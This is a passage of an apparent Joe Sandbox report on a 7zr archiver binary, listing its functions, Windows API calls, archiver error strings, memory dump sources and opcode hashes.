1059->1063 1064 5ef2f0-5ef30c memmove 1059->1064 1067 5ef31a-5ef355 memcpy 1063->1067 1068 5ef2d1-5ef2eb call 5ef37b 1063->1068 1064->1045 1067->1056 1068->1063 1072 5ef2ed 1068->1072 1072->1064
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Ce$Ce
                                        • API String ID: 3519838083-1067588111
                                        • Opcode ID: bf1427aa8d869c78fe3f610f0859fac52a1af261ad78412507a096533f6e776b
                                        • Instruction ID: d3b7c685d91250838076677bb01a9607ca5a46ec6235e78ae2a79cd2b899c317
                                        • Opcode Fuzzy Hash: bf1427aa8d869c78fe3f610f0859fac52a1af261ad78412507a096533f6e776b
                                        • Instruction Fuzzy Hash: A851947AA003469FDB14DFA5C8C4BBEBBB5FF88354F148429E941AB241DB74AD058B60

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                                        • String ID:
                                        • API String ID: 4012487245-0
                                        • Opcode ID: d672936226651516bda6dd83831356dc489f95ad41f95ddd4613ff5f06aefc3f
                                        • Instruction ID: b057e34318f77a1e99306887b5541d0ea84909849a777af2ca95828bef2a93e0
                                        • Opcode Fuzzy Hash: d672936226651516bda6dd83831356dc489f95ad41f95ddd4613ff5f06aefc3f
                                        • Instruction Fuzzy Hash: 83214A75901749EFDB509FA4DC46E99BB7AFB09B20F00121AF511A33E1D7B45440CF60

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                                        • String ID:
                                        • API String ID: 279829931-0
                                        • Opcode ID: 790f36facfc472cffccfc1038191357d396023c056b3ff522ddb5ed596dcb600
                                        • Instruction ID: c57644334c03ee0fb22dbb65f11e8c4dad2ca867c90aa4e2ec4cd99ed71b64ce
                                        • Opcode Fuzzy Hash: 790f36facfc472cffccfc1038191357d396023c056b3ff522ddb5ed596dcb600
                                        • Instruction Fuzzy Hash: 1A01E9B5901619EFDB44AFA0DC56CEE7B7AFB09710B10141AF601B32A1DA759440CB20

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C185D
                                          • Part of subcall function 005C021A: __EH_prolog.LIBCMT ref: 005C021F
                                          • Part of subcall function 005C062E: __EH_prolog.LIBCMT ref: 005C0633
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005C1961
                                          • Part of subcall function 005C1AA5: __EH_prolog.LIBCMT ref: 005C1AAA
                                        Strings
                                        • Duplicate archive path:, xrefs: 005C1A8D
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrow
                                        • String ID: Duplicate archive path:
                                        • API String ID: 2366012087-4000988232
                                        • Opcode ID: bf0ab091218a594b7f9b2247b5d6bc04fad977456725512792a8d24bc55667a7
                                        • Instruction ID: 59d93caa83434c6c8d0a9bf88a3356cb39abe137decaeb3025f0402e0c48db6e
                                        • Opcode Fuzzy Hash: bf0ab091218a594b7f9b2247b5d6bc04fad977456725512792a8d24bc55667a7
                                        • Instruction Fuzzy Hash: 08816A35D0054ADFCF25EFE4C995ADDBBB5BF99310F1040AAE50267292DB306E05CBA4

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A6C77
                                        • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 005A6EC9
                                          • Part of subcall function 005A6C72: wcscmp.MSVCRT ref: 005A70A5
                                          • Part of subcall function 005A6BF5: __EH_prolog.LIBCMT ref: 005A6BFA
                                          • Part of subcall function 005A6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 005A6C1A
                                          • Part of subcall function 005A6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 005A6C49
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                        • String ID: :$DATA
                                        • API String ID: 3316598575-2587938151
                                        • Opcode ID: d7407a6ba5bd9b4c4a5a8701875434e2959811b32dd5a761e2fc733b1df5e952
                                        • Instruction ID: 76a0aaac2131b263a2c748a361b22033f2f79f6cf3acb80855fc8ddbb7e865ef
                                        • Opcode Fuzzy Hash: d7407a6ba5bd9b4c4a5a8701875434e2959811b32dd5a761e2fc733b1df5e952
                                        • Instruction Fuzzy Hash: 75E1253090020A9ECF25EFA4C899BEEBFB5FF5B314F144519E8426B2D1DB71A949CB11
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B6FCA
                                          • Part of subcall function 005B6E71: __EH_prolog.LIBCMT ref: 005B6E76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                                        • API String ID: 3519838083-394804653
                                        • Opcode ID: 50ee111de191bf57656f5e024e5c10bd1e7b13c5a466360a219bda52db31bff0
                                        • Instruction ID: dce87a5cff6b32a985dd76c4c005308a971d6bd7bd44db7023cef71d74f92db5
                                        • Opcode Fuzzy Hash: 50ee111de191bf57656f5e024e5c10bd1e7b13c5a466360a219bda52db31bff0
                                        • Instruction Fuzzy Hash: 4B41727290964D9FCB21EFA884549EEFFB5BF99340F54446EE086A3201C6317E44CB61
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$H_prolog
                                        • String ID: =
                                        • API String ID: 2614055831-2525689732
                                        • Opcode ID: 4cb98d6b9378897e23455d153bb036383dc153ea82f01a48a8b1eec95cf4d41b
                                        • Instruction ID: 7474729f3e2a6161238a1803d249c478a23cb185db20b17c76aad8c907d2f51e
                                        • Opcode Fuzzy Hash: 4cb98d6b9378897e23455d153bb036383dc153ea82f01a48a8b1eec95cf4d41b
                                        • Instruction Fuzzy Hash: 45214D32904119ABCF15EB98E956BEDBFBAFF89310F20002BE40172291DF716E55CA95
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005EBDBA
                                          • Part of subcall function 005EBE69: __EH_prolog.LIBCMT ref: 005EBE6E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: d$0d$Dd
                                        • API String ID: 3519838083-2971680969
                                        • Opcode ID: ee4a7891205a9a0447aa982c3a46a666a0c538e8cbd0c8ac7bf4fdc707332b29
                                        • Instruction ID: fcd3825afab55b0f60e0102d96005b95b91148a1be97f9336eb76fb3642487e3
                                        • Opcode Fuzzy Hash: ee4a7891205a9a0447aa982c3a46a666a0c538e8cbd0c8ac7bf4fdc707332b29
                                        • Instruction Fuzzy Hash: ED11E3B0941745CFC324DF6AC588686FFE5FB19304F50C9AED4AA8B712C7B0A948CB51
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D8346
                                        • fputs.MSVCRT ref: 005D835B
                                        • fputs.MSVCRT ref: 005D8364
                                          • Part of subcall function 005D83BF: __EH_prolog.LIBCMT ref: 005D83C4
                                          • Part of subcall function 005D83BF: fputs.MSVCRT ref: 005D8401
                                          • Part of subcall function 005D83BF: fputs.MSVCRT ref: 005D8437
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$H_prolog
                                        • String ID: =
                                        • API String ID: 2614055831-2525689732
                                        • Opcode ID: a383dfedf100feebd90ce6be54794fbf0c634dcf75e218de0e0164c54f95dd25
                                        • Instruction ID: 37cc70e866a9afa710970b40e3a2237d81b325f28232d1d3019bd46e8cee5675
                                        • Opcode Fuzzy Hash: a383dfedf100feebd90ce6be54794fbf0c634dcf75e218de0e0164c54f95dd25
                                        • Instruction Fuzzy Hash: D801AD31A00409ABCB16BBA8DC1AAEEBF76FFC5710F00441AF405922A1CF754A55DBD5
                                        APIs
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,005BAB57), ref: 00637DAA
                                        • GetLastError.KERNEL32(?,00000000,005BAB57), ref: 00637DBB
                                        • CloseHandle.KERNELBASE(00000000,?,00000000,005BAB57), ref: 00637DCF
                                        • GetLastError.KERNEL32(?,00000000,005BAB57), ref: 00637DD9
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseHandleObjectSingleWait
                                        • String ID:
                                        • API String ID: 1796208289-0
                                        • Opcode ID: 563874194b5921ff1789a71fd0c7a439b385ab86c43d06ff4c857cdec4171050
                                        • Instruction ID: 21077d932301e55961e19cbecb22b492cccb7b14403d129c55deec714ffdabe4
                                        • Opcode Fuzzy Hash: 563874194b5921ff1789a71fd0c7a439b385ab86c43d06ff4c857cdec4171050
                                        • Instruction Fuzzy Hash: 6CF082B170C20647EB305ABD9C84FB6A6DAAF52775F201725F420C33D0DB60CC0086A0
                                        APIs
                                        • EnterCriticalSection.KERNEL32(00662938), ref: 005D588B
                                        • LeaveCriticalSection.KERNEL32(00662938), ref: 005D58BC
                                          • Part of subcall function 005DC911: GetTickCount.KERNEL32 ref: 005DC926
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CriticalSection$CountEnterLeaveTick
                                        • String ID: v$8)f
                                        • API String ID: 1056156058-2823517967
                                        • Opcode ID: 2156660dc30fd84ee32dcef94aed37daf52744b9ece86fe448d33ae580d381c8
                                        • Instruction ID: da9c9236674d5307b865bbb239172dc527bdd05522dad5a4ecaa90ea0142bdbc
                                        • Opcode Fuzzy Hash: 2156660dc30fd84ee32dcef94aed37daf52744b9ece86fe448d33ae580d381c8
                                        • Instruction Fuzzy Hash: 78E0E579606211DFC318DF19E918E9A7BA6BFE9321F05056FF409C7362CB309C49CAA1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C209B
                                          • Part of subcall function 005A757D: GetLastError.KERNEL32(005AD14C), ref: 005A757D
                                          • Part of subcall function 005C2C6C: __EH_prolog.LIBCMT ref: 005C2C71
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ErrorLastfree
                                        • String ID: Cannot find archive file$The item is a directory
                                        • API String ID: 683690243-1569138187
                                        • Opcode ID: 5285ac96c053c3cc36847300e3282c101df42ebba1c6fe078a0ee3446b9e5bd4
                                        • Instruction ID: 8dbbf7b4172d40cac983d7e904d576d5d23f5861585d03b8bd881c97057ccb06
                                        • Opcode Fuzzy Hash: 5285ac96c053c3cc36847300e3282c101df42ebba1c6fe078a0ee3446b9e5bd4
                                        • Instruction Fuzzy Hash: B1721374900259DFCB25DFA8C984BDEBFB5BF59300F14809EE859AB252CB709A81CF51
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CountTickfputs
                                        • String ID: .
                                        • API String ID: 290905099-4150638102
                                        • Opcode ID: 78f6e1e7d88ad8c88f10a3bfe0cce8cf0d7f285df33072ad249a32a4ca9c843b
                                        • Instruction ID: c87684ff528e00b73b008d74f8b1260c4ea4f3587de4b80708f6ed840a6c3432
                                        • Opcode Fuzzy Hash: 78f6e1e7d88ad8c88f10a3bfe0cce8cf0d7f285df33072ad249a32a4ca9c843b
                                        • Instruction Fuzzy Hash: 66711330600B069BDB35EB68C596AAEBFE6BF82304F40491FE08797A41DB74B945CB11
                                        APIs
                                          • Part of subcall function 005A9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 005A9CB3
                                          • Part of subcall function 005A9C8F: GetProcAddress.KERNEL32(00000000), ref: 005A9CBA
                                          • Part of subcall function 005A9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 005A9CC8
                                        • __aulldiv.LIBCMT ref: 005E093F
                                        • __aulldiv.LIBCMT ref: 005E094B
                                        Strings
                                        Similarity
                                        • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                        • String ID: 3333
                                        • API String ID: 3520896023-2924271548
                                        APIs
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        • memset.MSVCRT ref: 005CAEBA
                                        • memset.MSVCRT ref: 005CAECD
                                          • Part of subcall function 005E04D2: _CxxThrowException.MSVCRT(?,00654A58), ref: 005E04F8
                                        Strings
                                        Similarity
                                        • API ID: memset$ExceptionThrowfree
                                        • String ID: Split
                                        • API String ID: 1404239998-1882502421
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A759F
                                          • Part of subcall function 005A764C: CloseHandle.KERNELBASE(00000000,?,005A75AF,00000002,?,00000000,00000000), ref: 005A7657
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 005A75E5
                                        • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 005A7626
                                        Similarity
                                        • API ID: CreateFile$CloseH_prologHandle
                                        • String ID:
                                        • API String ID: 449569272-0
                                        APIs
                                        • fputs.MSVCRT ref: 005D8437
                                        • fputs.MSVCRT ref: 005D8401
                                          • Part of subcall function 005A1FB3: __EH_prolog.LIBCMT ref: 005A1FB8
                                        • __EH_prolog.LIBCMT ref: 005D83C4
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                        Similarity
                                        • API ID: H_prologfputs$fputc
                                        • String ID:
                                        • API String ID: 678540050-0
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,005A77DB,?,?,00000000,?,005A7832,?), ref: 005A7773
                                        • GetLastError.KERNEL32(?,005A77DB,?,?,00000000,?,005A7832,?,?,?,?,00000000), ref: 005A7780
                                        • SetLastError.KERNEL32(00000000,?,?,005A77DB,?,?,00000000,?,005A7832,?,?,?,?,00000000), ref: 005A7797
                                        Similarity
                                        • API ID: ErrorLast$FilePointer
                                        • String ID:
                                        • API String ID: 1156039329-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A5A91
                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 005A5AB7
                                        • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 005A5AEC
                                        Similarity
                                        • API ID: AttributesFile$H_prolog
                                        • String ID:
                                        • API String ID: 3790360811-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B5BEF
                                          • Part of subcall function 005B54C0: __EH_prolog.LIBCMT ref: 005B54C5
                                          • Part of subcall function 005B5630: __EH_prolog.LIBCMT ref: 005B5635
                                          • Part of subcall function 005C36EA: __EH_prolog.LIBCMT ref: 005C36EF
                                          • Part of subcall function 005B57C1: __EH_prolog.LIBCMT ref: 005B57C6
                                          • Part of subcall function 005B58BE: __EH_prolog.LIBCMT ref: 005B58C3
                                        Strings
                                        • Cannot seek to begin of file, xrefs: 005B610F
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Cannot seek to begin of file
                                        • API String ID: 3519838083-2298593816
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E4E8F
                                          • Part of subcall function 005A965D: VariantClear.OLEAUT32(?), ref: 005A967F
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Strings
                                        Similarity
                                        • API ID: ClearH_prologVariantfree
                                        • String ID: file
                                        • API String ID: 904627215-2359244304
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C2CE0
                                          • Part of subcall function 005A5E10: __EH_prolog.LIBCMT ref: 005A5E15
                                          • Part of subcall function 005B41EC: _CxxThrowException.MSVCRT(?,00654A58), ref: 005B421A
                                          • Part of subcall function 005A965D: VariantClear.OLEAUT32(?), ref: 005A967F
                                        Strings
                                        • Cannot create output directory, xrefs: 005C3070
                                        Similarity
                                        • API ID: H_prolog$ClearExceptionThrowVariant
                                        • String ID: Cannot create output directory
                                        • API String ID: 814188403-1181934277
                                        APIs
                                        • fputs.MSVCRT ref: 005DC840
                                          • Part of subcall function 005A25CB: _CxxThrowException.MSVCRT(?,00654A58), ref: 005A25ED
                                        Strings
                                        Similarity
                                        • API ID: ExceptionThrowfputs
                                        • String ID:
                                        • API String ID: 1334390793-399585960
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: fputs
                                        • String ID: Open
                                        • API String ID: 1795875747-71445658
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B58C3
                                          • Part of subcall function 005A6C72: __EH_prolog.LIBCMT ref: 005A6C77
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005F06B3
                                        • _CxxThrowException.MSVCRT(?,0065D480), ref: 005F08F2
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                        Similarity
                                        • API ID: ExceptionThrow$H_prologmalloc
                                        • String ID:
                                        • API String ID: 3044594480-0
                                        APIs
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C7B4D
                                        • memcpy.MSVCRT(00000000,006627DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 005C7C65
                                        Similarity
                                        • API ID: H_prologmemcpy
                                        • String ID:
                                        • API String ID: 2991061955-0
                                        • Opcode ID: f5449cf6298dfac3a5dc2d71b041d737ec0d8425f10887c02fe25039d96ffae9
                                        • Instruction ID: 30dbb30bafd8524e5532cd22f70cb1d77a59a6d201296cbb766be2a35d095c2e
                                        • Opcode Fuzzy Hash: f5449cf6298dfac3a5dc2d71b041d737ec0d8425f10887c02fe25039d96ffae9
                                        • Instruction Fuzzy Hash: AD41687090461A9FCB20EFA4C959FEEBBB5BF48304F10441DE442A3692DB31AE09CF51
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005F1516
                                          • Part of subcall function 005F10D3: __EH_prolog.LIBCMT ref: 005F10D8
                                        • _CxxThrowException.MSVCRT(?,0065D480), ref: 005F1561
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrow
                                        • String ID:
                                        • API String ID: 2366012087-0
                                        • Opcode ID: af8ad4e588a8eea681a88c8aadb4be3bc580e9700f1d74ec166f6f511110e78c
                                        • Instruction ID: 232c5dc216dd5f9386b484b48de225733be3747e551f88962a5e5bded9450553
                                        • Opcode Fuzzy Hash: af8ad4e588a8eea681a88c8aadb4be3bc580e9700f1d74ec166f6f511110e78c
                                        • Instruction Fuzzy Hash: B301F272500248EFDF118F94C815BEFBFB9FF813A0F04405AF5455B111C7B9A9558BA4
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D5800
                                        • fputs.MSVCRT ref: 005D5830
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prologfputcfputsfree
                                        • String ID:
                                        • API String ID: 195749403-0
                                        • Opcode ID: 257429a377f427de11153e7ef0cec15b52d6e0c33f465ec4bebe039c64e6cd86
                                        • Instruction ID: cd29163fcecc47b8656a4fb3f6104ef47055f2ace544bbb21f0366d71b20a205
                                        • Opcode Fuzzy Hash: 257429a377f427de11153e7ef0cec15b52d6e0c33f465ec4bebe039c64e6cd86
                                        • Instruction Fuzzy Hash: FDF0BE32800415CFCB16AB98E4067DEBFB2FF45310F00442AE402A35A1CB305941CB88
                                        APIs
                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 005A952C
                                        • _CxxThrowException.MSVCRT(?,006555B8), ref: 005A954A
                                        Memory Dump Source
